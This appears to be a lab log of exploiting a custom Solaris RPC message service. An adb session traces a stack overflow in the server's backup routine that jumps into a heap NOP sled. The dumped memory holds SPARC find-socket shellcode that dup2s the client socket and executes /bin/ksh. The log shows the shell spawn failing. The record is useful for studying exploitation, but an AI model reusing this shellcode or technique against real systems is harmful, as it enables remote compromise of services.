|9      |xdr_len_val
[115]   |0x00021dd4|0x00000000|FUNC |GLOB |0    
|UNDEF  |xdr_string
[77]    |0x000118b8|0x00000048|FUNC |GLOB |0    
|9      |xdr_svrmsg
[95]    |0x000119d8|0x00000044|FUNC |GLOB |0    
|9      |xdr_toName
[108]   |0x00011a88|0x00000094|FUNC |GLOB |0    
|9      |xdr_username_msg
[53]    |0x00021ccc|0x00000000|FUNC |GLOB |0    
|UNDEF  |xdr_void
testbox:/home/minchumo 

============================
Experiment Log

==>Normal usage of the RPC Service

testbox:/home/minchumo rmsg testbox dog cat hi
dog  said  to  cat==> hi
testbox:/home/minchumo 



===>Exploitation:
0. Run server msg_svc
1. First several normal executions of RPC server as 
above.
2. Run hacking code
3. Interact as following

==>Client side

testbox:/home/minchumo rmsge testbox
port=59985 connected! 
sent!


===>Server side

testbox:/home/minchumo r ps
ps -ef | grep msg
minchumo  6928  6142  0 10:26:30 pts/4    0:00 grep 
msg
minchumo  6924     1  0 10:25:46 ?        0:00 msg_svc

testbox:/home/minchumo adb
0t6924:A
process 6924 stopped at:
_poll+4:        ta      0x8

/* set a breakpoint at the entry of makemsg_1 and continue */
makemsg_1:b
:c
breakpoint at:
makemsg_1:      save    %sp, -0x78, %sp
:s
stopped at:
makemsg_1+4:    st      %i1, [%fp + 0x48]
:s
stopped at:
makemsg_1+8:    st      %i0, [%fp + 0x44]
:S
stopped at:
makemsg_1+0xc:  sethi   %hi(0x21c00), %l0
:s
stopped at:
makemsg_1+0x10: ld      [%l0 + 0x3fc], %l0
:s
stopped at:
makemsg_1+0x14: cmp     %l0, %g0
:s
stopped at:
makemsg_1+0x18: be      makemsg_1+0x2c
:s
stopped at:
makemsg_1+0x1c: nop
:s
stopped at:
makemsg_1+0x20: sethi   %hi(0x21c00), %l0
:s
stopped at:

/* This is the call to free(): a normal client request was served earlier,
   so the buffer holding that reply was allocated and must be released. */
makemsg_1+0x24: call    0x21c6c
:s
stopped at:
makemsg_1+0x28: ld      [%l0 + 0x3fc], %o0
:s
stopped at:
21c6c:          sethi   %hi(0x15000), %g1
:s
stopped at:
21c70:          sethi   %hi(0xff1c6400), %g1
$r
g0    0                                 l0      21c00
g1    15000         xdr_username_msg+0x3578     l1    0
g2    0                                 l2      0
g3    0                                 l3      0
g4    0                                 l4      0
g5    0                                 l5      0
g6    0                                 l6      0
g7    0                                 l7      0
o0    6da58                             i0      ffbeee48
o1    0                                 i1      24808       
_rpcpmstart+0x2808
o2    0                                 i2      ffbeee48
o3    0                                 i3      66f00
o4    0                                 i4      ff311c8c
o5    0                                 i5      ffbeee61
sp    ffbeed60                          fp      ffbeedd8
o7    11044         makemsg_1+0x24      i7      
114ac       msgboard_prog_1+0x154
y     0
tstate: 82001a07  (ccr=0x0, asi=0x82, pstate=0x1a, 
cwp=0x7)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 
mg:0 ig:0
pc    21c70 21c70:              sethi   %hi(0xff1c6400), %
g1
npc   21c74 21c74:              jmp     %g1 + 0x14c
/* 0x6da58 points to the server's reply to the previous client request;
   this is the dynamically allocated memory about to be freed. */
6da58/4X
6da58:          646f6720        20736169        
64202074        6f202063
6da58/S
6da58:          dog  said  to  cat==> hi


memset:b
:c
breakpoint at:
memset:         mov     %o0, %o5
$r
g0    0                                 l0      21f10       
dynMemSize
g1    1e000                             l1      ffbeee48
g2    0                                 l2      0
g3    0                                 l3      0
g4    0                                 l4      0
g5    0                                 l5      0
g6    0                                 l6      0
g7    0                                 l7      0
o0    6da58                             i0      ffbeee48
o1    0                                 i1      24808       
_rpcpmstart+0x2808
o2    600                               i2      ffbeee48
o3    0                                 i3      66f00
o4    ff235ad4                          i4      ff311c8c
o5    11044         makemsg_1+0x24      i5      ffbeee61
sp    ffbeed60                          fp      ffbeedd8
o7    11080         makemsg_1+0x60      i7      
114ac       msgboard_prog_1+0x154
y     0
tstate: 82001a04  (ccr=0x0, asi=0x82, pstate=0x1a, 
cwp=0x4)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 
mg:0 ig:0
pc    ff33190c memset:          mov     %o0, %o5
npc   ff331910 _memset+4:       cmp     %o2, 0x10
memcpy:b
:c

/* The SIGALRM that ends the 5-second sleep() wakes the server.  This also
   shows that adb is notified of the signal delivery, so we just continue. */
SIGALRM: Alarm Clock
stopped at:
_sigsuspend+4:  ta      0x8
:c

/* The following five memcpy calls copy the client request into the
   dynamically allocated buffer. */
breakpoint at:
memcpy:         mov     %o0, %o5
:c
breakpoint at:
memcpy:         mov     %o0, %o5
:c
breakpoint at:
memcpy:         mov     %o0, %o5
:c
breakpoint at:
memcpy:         mov     %o0, %o5
backup:b
:c
breakpoint at:
memcpy:         mov     %o0, %o5
:c
breakpoint at:
backup:         save    %sp, -0x60, %sp
:s
stopped at:
backup+4:       st      %i1, [%fp + 0x48]
$r
g0    0                                 l0      0
g1    676a8                             l1      0
g2    0                                 l2      0
g3    0                                 l3      0
g4    0                                 l4      0
g5    0                                 l5      0
g6    0                                 l6      0
g7    0                                 l7      0
o0    0                                 i0      67470
o1    0                                 i1      fc
o2    0                                 i2      0
o3    0                                 i3      0
o4    0                                 i4      0
o5    0                                 i5      6dc60
sp    ffbeed00                          fp      ffbeed60
o7    0                                 i7      11138       
makemsg_1+0x118
y     0
tstate: 4482001a06  (ccr=0x44, asi=0x82, 
pstate=0x1a, cwp=0x6)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 
mg:0 ig:0
pc    11184 backup+4:           st      %i1, [%fp + 0x48]
npc   11188 backup+8:           st      %i0, [%fp + 0x44]

/* After the five memcpy calls we can inspect the dynamic memory to check
   that the request was copied intact; it looks good below. */
6da58/40X
6da58:          6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80

6daf8:          6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
20207361
                69642020        746f2020        6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80

6db98:          6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80

6dc38:          6dc80           6dc80           6dc80           
6dc80
                6dc80           6dc80           6dc80           
6dc80
                6dc80           3d3d3e20        801c4011        
801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011

6dcd8:          801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        
801c4011        801c4011
                801c4011        801c4011        20bfffff        
20bfffff
                7fffffff        3302ea51        a01020ff        
a2102054

6dd78:          a403ffd0        aa03e028        
81c56008        c02be004
                e603ffd0        e803e004        a8a4c014        
2bffffb
                aa03e05c        e223ffc4        e223ffc8        
e423ffcc
                90042001        a72c6008        
9214e091        9403ffc4
                82102036        91d02008        1abffff1        
a0a42001
                12bffff5        a6102003        90042002        
92102009
                9404ffff        8210203e        a684ffff        
12bffffb
                91d02008        20bfffff        20bfffff        7fffffff
                9003e020        92022010        
c0222008        d0222010
                c0222014        8210200b        
91d02008        2f62696e

6de18:          2f6b7368        0               0               0
                0               0               0               0
                0               0               0               0
                0               0               0               0
                0               0               0               0
                0               0               0               0
                0               0               0               0
                0               0               0               0
                0               0               0               0
                0               0               0               0
backup+4/i

/* Now call into the vulnerable function to overflow the stack and jump into the heap. */

backup+4:       st      %i1, [%fp + 0x48]
:S
stopped at:
backup+8:       st      %i0, [%fp + 0x44]
:s
stopped at:
backup+0xc:     or      %i0, %g0, %o0
:s
stopped at:
backup+0x10:    call    inbackup
:s
stopped at:
backup+0x14:    or      %i1, %g0, %o1
:s
stopped at:
inbackup:       save    %sp, -0x70, %sp
:s
stopped at:
inbackup+4:     st      %i1, [%fp + 0x48]
:S
stopped at:
inbackup+8:     st      %i0, [%fp + 0x44]
:s
stopped at:
inbackup+0xc:   add     %fp, -0xc, %o0
:s
stopped at:
inbackup+0x10:  or      %i0, %g0, %o1
:s
stopped at:
inbackup+0x14:  call    0x21c9c
:s
stopped at:
inbackup+0x18:  or      %i1, %g0, %o2
:s
stopped at:
21c9c:          sethi   %hi(0x21000), %g1
inbackup+0x1c:b
:c
breakpoint at:
memcpy:         mov     %o0, %o5
:s
stopped at:
forcpy+4:       cmp     %o2, 0x20
:s
stopped at:
forcpy+8:       ???
:c
breakpoint at:
inbackup+0x1c:  ret
:s
stopped at:
inbackup+0x20:  restore
:s
stopped at:
backup+0x18:    ret
:s
stopped at:
backup+0x1c:    restore
:s
stopped at:
/* Control has now been transferred to the heap (into the NOP sled). */

6dc88:          xor     %l1, %l1, %g0
$r
g0    0                                 l0      801c4011
g1    67568                             l1      801c4011
g2    0                                 l2      801c4011
g3    0                                 l3      801c4011
g4    0                                 l4      801c4011
g5    0                                 l5      801c4011
g6    0                                 l6      801c4011
g7    0                                 l7      801c4011
o0    6dc80                             i0      801c4011
o1    6dc80                             i1      801c4011
o2    6dc80                             i2      801c4011
o3    6dc80                             i3      801c4011
o4    6dc80                             i4      801c4011
o5    6dc80                             i5      801c4011
sp    6dc80                             fp      801c4011
o7    6dc80                             i7      801c4011
y     0
tstate: 4482001a01  (ccr=0x44, asi=0x82, 
pstate=0x1a, cwp=0x1)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 
mg:0 ig:0
pc    6dc88 6dc88:              xor     %l1, %l1, %g0
npc   6dc8c 6dc8c:              xor     %l1, %l1, %g0
.,40/i
6dc8c:          xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                bn,a    0x6dd5c
                bn,a    0x6dd60
                call    0x6dd64
                sethi   %hi(0xba94400), %i1
                mov     0xff, %l0
                mov     0x54, %l1
                add     %o7, -0x30, %l2
                add     %o7, 0x28, %l5
                jmp     %l5 + 0x8
                stb     %g0, [%o7 + 0x4]
                ld      [%o7 - 0x30], %l3
.,20/i
6dd88:          ld      [%o7 - 0x30], %l3
                ld      [%o7 + 0x4], %l4
                subcc   %l3, %l4, %l4
                be      0x6dd80
                add     %o7, 0x5c, %l5
                st      %l1, [%o7 - 0x3c]
                st      %l1, [%o7 - 0x38]
                st      %l2, [%o7 - 0x34]
                add     %l0, 0x1, %o0
                sll     %l1, 0x8, %l3
                or      %l3, 0x91, %o1
                add     %o7, -0x3c, %o2
                mov     0x36, %g1
                ta      0x8
                bgeu    0x6dd84
                subcc   %l0, 0x1, %l0
                bne     0x6dd9c
                mov     0x3, %l3
                add     %l0, 0x2, %o0
                mov     0x9, %o1
                add     %l3, -0x1, %o2
                mov     0x3e, %g1
                addcc   %l3, -0x1, %l3
                bne     0x6ddd0
                ta      0x8
                bn,a    0x6dde8
                bn,a    0x6ddec
                call    0x6ddf0
                add     %o7, 0x20, %o0
                add     %o0, 0x10, %o1
                st      %g0, [%o0 + 0x8]
                st      %o0, [%o0 + 0x10]
6dc8c+20:b
:c
breakpoint at:
6dcac:          xor     %l1, %l1, %g0
.,10/i
6dcac:          xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0

6dcec:          xor     %l1, %l1, %g0
6dcac+10:b
:c
breakpoint at:
6dcbc:          xor     %l1, %l1, %g0
.,10/i
6dcbc:          xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
6dcbc+40:b
:c
breakpoint at:
6dcfc:          xor     %l1, %l1, %g0
.,10/i
6dcfc:          xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0

6dd3c:          xor     %l1, %l1, %g0
6dd3c:b
:c
breakpoint at:
6dd3c:          xor     %l1, %l1, %g0
.20/i
bad command
.,20/i
6dd3c:          xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                xor     %l1, %l1, %g0
                bn,a    0x6dd5c
                bn,a    0x6dd60
                call    0x6dd64
                sethi   %hi(0xba94400), %i1
                mov     0xff, %l0
                mov     0x54, %l1
                add     %o7, -0x30, %l2
                add     %o7, 0x28, %l5
                jmp     %l5 + 0x8
                stb     %g0, [%o7 + 0x4]
                ld      [%o7 - 0x30], %l3
                ld      [%o7 + 0x4], %l4
                subcc   %l3, %l4, %l4
                be      0x6dd80
                add     %o7, 0x5c, %l5
                st      %l1, [%o7 - 0x3c]
                st      %l1, [%o7 - 0x38]
                st      %l2, [%o7 - 0x34]
                add     %l0, 0x1, %o0
                sll     %l1, 0x8, %l3
                or      %l3, 0x91, %o1
                add     %o7, -0x3c, %o2
                mov     0x36, %g1
$r
g0    0                                 l0      801c4011
g1    67568                             l1      801c4011
g2    0                                 l2      801c4011
g3    0                                 l3      801c4011
g4    0                                 l4      801c4011
g5    0                                 l5      801c4011
g6    0                                 l6      801c4011
g7    0                                 l7      801c4011
o0    6dc80                             i0      801c4011
o1    6dc80                             i1      801c4011
o2    6dc80                             i2      801c4011
o3    6dc80                             i3      91d02001
o4    6dc80                             i4      801c4011
o5    6dc80                             i5      801c4011
sp    6dc80                             fp      801c4011
o7    6dc80                             i7      91d02001
y     0
tstate: 4482001a04  (ccr=0x44, asi=0x82, 
pstate=0x1a, cwp=0x4)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 
mg:0 ig:0
pc    6dd3c 6dd3c:              xor     %l1, %l1, %g0
npc   6dd40 6dd40:              xor     %l1, %l1, %g0
:s
stopped at:
6dd40:          xor     %l1, %l1, %g0
:s
stopped at:
6dd44:          xor     %l1, %l1, %g0
:s
stopped at:
6dd48:          xor     %l1, %l1, %g0
:s
stopped at:
6dd4c:          xor     %l1, %l1, %g0
:s
stopped at:
6dd50:          xor     %l1, %l1, %g0
:s
stopped at:
6dd54:          xor     %l1, %l1, %g0
:s
stopped at:
6dd58:          xor     %l1, %l1, %g0
:s
stopped at:
6dd5c:          xor     %l1, %l1, %g0
:s
stopped at:
6dd60:          bn,a    0x6dd5c
:s
stopped at:
6dd68:          call    0x6dd64
:s
stopped at:
6dd6c:          sethi   %hi(0xba94400), %i1
:S
stopped at:
6dd64:          bn,a    0x6dd60
:s
stopped at:
6dd6c:          sethi   %hi(0xba94400), %i1
:s
stopped at:
6dd70:          mov     0xff, %l0
:s
stopped at:
6dd74:          mov     0x54, %l1
:s
stopped at:
6dd78:          add     %o7, -0x30, %l2
:s
stopped at:
6dd7c:          add     %o7, 0x28, %l5
:S
stopped at:
6dd80:          jmp     %l5 + 0x8
:s
stopped at:
6dd84:          stb     %g0, [%o7 + 0x4]
:s
stopped at:
6dd98:          add     %o7, 0x5c, %l5
:s
stopped at:
6dd9c:          st      %l1, [%o7 - 0x3c]
:s
stopped at:
6dda0:          st      %l1, [%o7 - 0x38]
:s
stopped at:
6dda4:          st      %l2, [%o7 - 0x34]
:s
stopped at:
6dda8:          add     %l0, 0x1, %o0
:s
stopped at:
6ddac:          sll     %l1, 0x8, %l3
:s
stopped at:
6ddb0:          or      %l3, 0x91, %o1
:s
stopped at:
6ddb4:          add     %o7, -0x3c, %o2
:s
stopped at:
6ddb8:          mov     0x36, %g1
:s
stopped at:
6ddbc:          ta      0x8

/* For the getPeername system call, refer to the LSD-PL doc 
for the correct 
   register values. In particular:
   g1=36, o0=sfd (socket file descriptor), o1=request ID,
   o2 is a pointer to the structure {54 54 pointerInternetAdd}, 
which in our case is at 6dd2c.
   returnAdd points to the memory right after it, which is 
6dd38
   */
$r
g0    0                                 l0      ff
g1    36                                l1      54
g2    0                                 l2      6dd38
g3    0                                 l3      5400
g4    0                                 l4      801c4011
g5    0                                 l5      6ddc4
g6    0                                 l6      801c4011
g7    0                                 l7      801c4011
o0    100                               i0      801c4011
o1    5491                              i1      ba94400
o2    6dd2c                             i2      801c4011
o3    6dc80                             i3      801c4011
o4    6dc80                             i4      801c4011
o5    6dc80                             i5      801c4011
sp    6dc80                             fp      801c4011
o7    6dd68                             i7      801c4011
y     0
tstate: 4482001a00  (ccr=0x44, asi=0x82, 
pstate=0x1a, cwp=0x0)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 
mg:0 ig:0
pc    6ddbc 6ddbc:              ta      0x8
npc   6ddc0 6ddc0:              bgeu    0x6dd84
6dd2c/4X
6dd2c:          54              54              6dd38           
801c4011
6dd3c:          801c4011        801c4011        
801c4011        801c4011
6ddbc/i
6ddbc:          ta      0x8
.,10/i
6ddbc:          ta      0x8
                bgeu    0x6dd84
                subcc   %l0, 0x1, %l0
                bne     0x6dd9c
                mov     0x3, %l3
                add     %l0, 0x2, %o0
                mov     0x9, %o1
                add     %l3, -0x1, %o2
                mov     0x3e, %g1
                addcc   %l3, -0x1, %l3
                bne     0x6ddd0
                ta      0x8
                bn,a    0x6dde8
                bn,a    0x6ddec
                call    0x6ddf0
                add     %o7, 0x20, %o0
stopped at:
6ddd4:          mov     0x9, %o1
:s
stopped at:
6ddd8:          add     %l3, -0x1, %o2
:s
stopped at:
6dddc:          mov     0x3e, %g1
:s
stopped at:
6dde0:          addcc   %l3, -0x1, %l3
:s
stopped at:
6dde4:          bne     0x6ddd0
:s
stopped at:
6dde8:          ta      0x8

/* After the above getPeername loop iterates from 
100 down to 0, 
   it successfully locates the socket fd -- 8 -- of the current 
client.
   Now it duplicates that fd onto fd 0/1/2 and tries to spawn a 
shell
*/   
   
$r
g0    0                                 l0      6
g1    3e                                l1      54
g2    0                                 l2      6dd38
g3    0                                 l3      2
g4    0                                 l4      0
g5    0                                 l5      6ddc4
g6    0                                 l6      801c4011
g7    0                                 l7      801c4011
o0    8                                 i0      801c4011
o1    9                                 i1      ba94400
o2    2                                 i2      801c4011
o3    6dc80                             i3      801c4011
o4    6dc80                             i4      801c4011
o5    6dc80                             i5      801c4011
sp    6dc80                             fp      801c4011
o7    6dd68                             i7      801c4011
y     0
tstate: 1182001a02  (ccr=0x11, asi=0x82, 
pstate=0x1a, cwp=0x2)
pstate: ag:0 ie:1 priv:0 am:1 pef:1 mm:0 tle:0 cle:0 
mg:0 ig:0
pc    6dde8 6dde8:              ta      0x8
npc   6ddd0 6ddd0:              add     %l0, 0x2, %o0
.,10/i
6ddd0:          add     %l0, 0x2, %o0
                mov     0x9, %o1
                add     %l3, -0x1, %o2
                mov     0x3e, %g1
                addcc   %l3, -0x1, %l3
                bne     0x6ddd0
                ta      0x8
                bn,a    0x6dde8
                bn,a    0x6ddec
                call    0x6ddf0
                add     %o7, 0x20, %o0
                add     %o0, 0x10, %o1
                st      %g0, [%o0 + 0x8]
                st      %o0, [%o0 + 0x10]
                st      %g0, [%o0 + 0x14]
                mov     0xb, %g1

6de10:          ta      0x8
6ddd0/i
6ddd0:          add     %l0, 0x2, %o0
:c
breakpoint at:
6ddd0:          add     %l0, 0x2, %o0
6ddd0:d
:c

/*The shell spawn seems to fail for some reason, and we 
didn't
receive an interactive channel on the client side*/

stopped at:
_rt_boot:       ba,a    _elf_start
:c
SIGSEGV: Segmentation Fault (address not mapped 
to object)
stopped at:
elf_find_sym+0xa4:              ld      [%o0 + %i2], %o1





